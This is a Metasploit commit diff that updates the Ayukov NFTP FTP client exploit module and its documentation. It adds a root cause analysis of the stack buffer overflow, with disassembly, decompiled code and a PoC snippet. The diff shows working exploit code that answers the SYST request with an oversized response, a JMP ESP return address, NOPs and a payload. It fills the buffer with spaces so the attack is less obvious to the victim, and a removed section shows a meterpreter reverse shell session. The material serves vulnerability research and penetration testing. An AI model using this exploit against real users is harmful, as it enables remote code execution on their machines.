Update ayukov_nftp exploit and module documentation

Author: wchen-r7

documentation/modules/exploit/windows/ftp/ayukov_nftp.md

@@ -1,36 +1,189 @@
+# Ayukov NFTP FTP Client Stack Buffer Overflow Analysis
+
+## Introduction
+
+Ayukov is an FTP client that was written by Sergey Ayukov back in 1994. Development stopped in
+2011, and it is vulnerable to a stack-based buffer overflow vulnerability due to the way it
+handles the server input.
+
+The exploit was tested on Windows XP SP3 (English).
+
 ## Vulnerable Application
 
-  Tested on Windows XP Professional SP3 EN
+The vulnerable copy can be [downloaded from Exploit-DB](https://www.exploit-db.com/apps/a766d928899200ed6a21f7c790b5cbe5-nftp-1.71-i386-win32.exe).
+
+## PoC
+
+A submission was made to Metasploit as [PR #9360](https://github.com/rapid7/metasploit-framework/pull/9360). Here's an example of how to crash the FTP client:
+
+```ruby
+  # Let the client log in
+  client.get_once
+
+  user = "331 OK.\r\n"
+  client.put(user)
+
+  client.get_once
+  pass = "230 OK.\r\n"
+  client.put(pass)
+
+  sploit = "A"*4116
+  sploit << [target.ret].pack('V') # JMP ESP here
+  sploit << "\x90"*16
+  sploit << payload.encoded
+  sploit << "C" * (15000 - 4116 - 4 - 16 - payload.encoded.length)
+  sploit << "\r\n"
+
+  client.put(sploit)
+
+  client.get_once
+  pwd = "257\r\n"
+  client.put(pwd)
+  client.get_once
+```
+
+## Root Cause Analysis
+
+When serving the PoC against the vulnerable app, the client's command prompt shows:
+
+```
+12:28:43 331 OK.
+12:28:43 USER anonymous
+12:28:43 230 OK.
+12:28:43 Successfully logged in as '[email protected]'
+12:28:43 SYST
+12:28:43 .................. Lots of AAAAAs here .....................
+12:28:43 TYPE I
+12:28:43 257
+```
+
+The interesting part here is that when the client sends a ```SYST``` request, the server responds
+with a long string of data attempting to cause a crash. This would be a good starting point to
+investigate the root cause.
+
+With IDA Pro, we can tell that the ```SYST``` string is at the following location:
+
+```
+.text:004096B6 ; char aSyst[]
+.text:004096B6 aSyst           db 'SYST',0             ; DATA XREF: sub_409978+B8Co
+```
+
+When we cross reference, we can tell this is used by the ```OpenControlConnection``` function.
+Although there is no symbol to identify the actual function name "OpenControlConnection", the
+debugging message at the beginning of the function is a big hint:
+
+```C
+int __usercall OpenControlConnection@<eax>(int a1@<ebx>, int a2@<edi>, int a3@<esi>)
+{
+  sub_45AF40(savedregs);
+  *(_DWORD *)&name.sa_data[10] = a2;
+  *(_DWORD *)&name.sa_data[6] = a3;
+  *(_DWORD *)&name.sa_data[2] = a1;
+  if ( !dword_477AEC )
+    sub_419B4C(1);
+  while ( 1 )
+  {
+    while ( 1 )
+    {
+      do
+      {
+        sub_403484("begin OpenControlConnection()\n", charResBuffer[4088]);
+        ...
+```
+
+Anyway, inside the OpenControlConnection function, we can see that the ```SYST``` command is
+requested here for SendFTPRequest (no symbol of clue of the name, I just decided to name it this
+way):
+
+```
+.text:0040A504                 push    offset aSyst    ; "SYST"
+.text:0040A509                 lea     eax, [ebp+charResBuffer]
+.text:0040A50F                 push    eax             ; charResBuffer
+.text:0040A510                 lea     eax, [ebp+args]
+.text:0040A516                 push    eax             ; int
+.text:0040A517                 push    0               ; int
+.text:0040A519                 call    SendFTPRequest
+```
+
+Inside the SendFTPRequest function, it looks like this:
+
+```C
+int SendFTPRequest(int a1, int arg_4, char *charResBuffer, char *Format, ...)
+{
+  char *v4; // ebx@0
+  int v5; // edi@0
+  int v6; // esi@0
+  char *v7; // edx@1
+  char Dst[16384]; // [esp+18h] [ebp-4000h]@2
+  char *savedregs; // [esp+4018h] [ebp+0h]@1
+  va_list va; // [esp+4030h] [ebp+18h]@1
+
+  va_start(va, Format);
+  sub_45AF40(savedregs);
+  savedregs = v4;
+  v7 = Format;
+  if ( Format )
+  {
+    v4 = Dst;
+    // This actually checks the input for the FTP command from the client.
+    // The 0x4000u indicates the string should not be longer than that, otherwise
+    // there will be a buffer overflow warning in this function.
+    snprintf1(Dst, 0x4000u, Format, va);
+    v7 = Dst;
+  }
+  return SendReceive((int)v4, v5, v6, a1, arg_4, charResBuffer, v7);
+}
+```
+
+We were able to tell the second argument for ```SendFTPRequest``` is actually a buffer for receiving
+the server's response, because the way it is used:
 
-  Install the application from the link below.
+```C
+result = SendFTPRequest(0, (int)args, charResBuffer, "SYST");
+if ( result == -4 )
+  return result;
+if ( result )
+  goto LABEL_231;
+if ( *(_DWORD *)args == 2 )
+{
+  sub_445CEC(charResBuffer);
+  if ( strstr(charResBuffer, "unix") )
+  {
+    if ( strstr(charResBuffer, "powerweb") )
+    {
+      *(_DWORD *)dword_47B1E0 = 6;
+      goto LABEL_206;
+    }
+  }
+...
+```
 
-  [NFTP 1.71](https://www.exploit-db.com/apps/a766d928899200ed6a21f7c790b5cbe5-nftp-1.71-i386-win32.exe)
+In addition, this buffer is actually on the stack, and it's 4096 long:
 
-## Verification Steps
+```
+-00001010 charResBuffer   db 4096 dup(?)
+```
 
-  1. Install the application
-  2. Start msfconsole
-  3. Do: ```use exploit/windows/ftp/ayukov_nftp```
-  4. Set options and payload
-  5. Do: ```exploit```
-  6. Connect to the FTP server using the NFTP FTP client
-  6. You should get a shell
+This means that if the server responds with something longer than 4096 bytes for the ```SYST``` request,
+the data may corrupt the stack, and cause a stack-based buffer overflow. At the end of
+```OpenControlConnection```, the ```RETN``` ends up loading the corrupt data, which may lead to
+arbitrary code execution:
 
-## Scenarios
+```
+.text:0040AC39                 lea     esp, [ebp-2048h]
+.text:0040AC3F                 pop     ebx
+.text:0040AC40                 pop     esi
+.text:0040AC41                 pop     edi
+.text:0040AC42                 leave
+.text:0040AC43                 retn
+```
 
-  To obtain a shell:
+Since whoever is using ```SendFTPRequest``` is responsible for providing the buffer of the server
+response, and there are 47 other cross-references, it is possible there are different ways to
+trigger the same bug. And since it doesn't look like there is a patch (because the product is
+no longer in active development, from the exploit developer's perspective, it is not necessary
+to look for other ways to exploit it).
 
-  ```
-msf > use exploit/windows/ftp/ayukov_nftp
-msf exploit(windows/ftp/ayukov_nftp) > set PAYLOAD windows/meterpreter/reverse_tcp
-PAYLOAD => windows/meterpreter/reverse_tcp
-msf exploit(windows/ftp/ayukov_nftp) > set LHOST 192.168.216.5 
-LHOST => 192.168.216.5
-msf exploit(windows/ftp/ayukov_nftp) > exploit 
-[*] Exploit running as background job 0.
+## References
 
-[*] Started reverse TCP handler on 192.168.216.5:4444 
-msf exploit(windows/ftp/ayukov_nftp) > [*] Server started.
-[*] Sending stage (179779 bytes) to 192.168.216.156
-[*] Meterpreter session 1 opened (192.168.216.5:4444 -> 192.168.216.156:1046) at 2017-12-31 10:05:50 -0500
-  ```
+https://nvd.nist.gov/vuln/detail/CVE-2017-15222

modules/exploits/windows/ftp/ayukov_nftp.rb

@@ -10,14 +10,18 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'           => 'Ayukov NFTP FTP Client Remote Buffer Overflow',
+      'Name'           => 'Ayukov NFTP FTP Client Buffer Overflow',
       'Description'    => %q{
-          This module exploits a buffer overflow in the Ayukov NFTPD FTP client 2.0 and earlier allowing remote code execution.
+          This module exploits a stack-based buffer overflow vulnerability against Ayukov NFTPD FTP
+          Client 2.0 and earlier. By responding with a long string of data for the SYST request, it
+          is possible to cause a denail-of-service condition on the FTP client, or arbitrary remote
+          code exeuction under the context of the user if successfully exploited.
       },
       'Author'   =>
         [
           'Berk Cem Goksel',  # Original exploit author
-          'Daniel Teixeira'   # MSF module author
+          'Daniel Teixeira',  # MSF module author
+          'sinn3r'            # RCA, improved module reliability and user exp
         ],
       'License'        => MSF_LICENSE,
       'References'     =>
@@ -27,7 +31,8 @@ def initialize(info = {})
         ],
       'Payload'        =>
         {
-          'BadChars' => "\x00\x01\x0a\x10",
+          'BadChars' => "\x00\x01\x0a\x10\x0d",
+          'StackAdjustment' => -3500
         },
       'Platform'       => 'win',
       'Targets'        =>
@@ -48,27 +53,50 @@ def initialize(info = {})
       ])
   end
 
+  def exploit
+    srv_ip_for_client = datastore['SRVHOST']
+    if srv_ip_for_client == '0.0.0.0'
+      if datastore['LHOST']
+        srv_ip_for_client = datastore['LHOST']
+      else
+        srv_ip_for_client = Rex::Socket.source_address('50.50.50.50')
+      end
+    end
+
+    srv_port = datastore['SRVPORT']
+
+    print_status("Please ask your target(s) to connect to #{srv_ip_for_client}:#{srv_port}")
+    super
+  end
+
   def on_client_connect(client)
     return if ((p = regenerate_payload(client)) == nil)
-
+    print_status("#{client.peerhost} - connected")
 
     # Let the client log in
     client.get_once
 
+    print_status("#{client.peerhost} - sending 331 OK")
     user = "331 OK.\r\n"
     client.put(user)
 
     client.get_once
+    print_status("#{client.peerhost} - sending 230 OK")
     pass = "230 OK.\r\n"
     client.put(pass)
 
-    sploit = "A"*4116
+    # It is important to use 0x20 (space) as the first chunk of the buffer, because this chunk
+    # is visible from the user's command prompt, which would make the buffer overflow attack too
+    # obvious.
+    sploit = "\x20"*4116
+
     sploit << [target.ret].pack('V')
-    sploit << "\x90"*16
+    sploit << make_nops(10)
     sploit << payload.encoded
-    sploit << make_nops(15000 - 4116 - 4 - 16 - payload.encoded.length)
+    sploit << Rex::Text.rand_text(15000 - 4116 - 4 - 16 - payload.encoded.length, payload_badchars)
     sploit << "\r\n"
 
+    print_status("#{client.peerhost} - sending the malicious response")
     client.put(sploit)
 
     client.get_once